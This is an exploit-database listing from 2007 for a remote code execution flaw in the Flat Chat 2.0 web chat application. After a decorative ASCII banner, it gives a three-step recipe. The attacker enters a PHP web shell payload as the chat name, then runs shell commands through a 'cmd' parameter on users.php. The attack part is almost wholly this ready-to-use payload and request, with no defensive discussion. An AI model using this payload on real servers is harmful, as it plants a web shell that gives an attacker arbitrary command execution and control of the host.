Flat Chat 2.0 (include online.txt) Remote Code Execution Vulnerability

2007-03-07T00:00:00
ID 1337DAY-ID-1560
Type zdt
Reporter Dj7xpl
Modified 2007-03-07T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================================
Flat Chat 2.0 (include online.txt) Remote Code Execution Vulnerability
======================================================================



                                           .-""""""""-.                                 
                                          /   Dj7xpl   \                              
                                         |              |                                
                                         |,  .-.  .-.  ,|                                
                                         | )(_o/  \o_)( |                                     
                                         |/     /\     \|                                 
                               (@_       (_     ^^     _)                  
                          _     ) \_______\__|IIIIII|__/_______________________________
                         (_)@[email protected]{}<________|-\IIIIII/-|________________________________>
                                )_/        \          / 
                                (@
+_______________________________________________________________________________________________________________________+
+
+
+                               +=============================================+
+                               |                                             |
+                               | Portal   : Flat Chat                        |
+                               | Version  : 2.0                              |
+                               | Risk     : High (Remote Code Execution)     |
+                               |                                             |
+                               +=============================================+
+
+              Exploit : 
+                         Http://localhost/flatchat/index.php   <<<<<<  Open Index Page
+
+                         Insert This Script In Chat Name:  e.g:  <?php passthru($_GET[cmd]); ?>
+
+                         Http://localhost/flatchat/users.php?cmd=ls -la   <<<  Enter Your Command
+                                                                              				            	  
+_______________________________________________________________________________________________________________________+



#  0day.today [2018-03-16]  #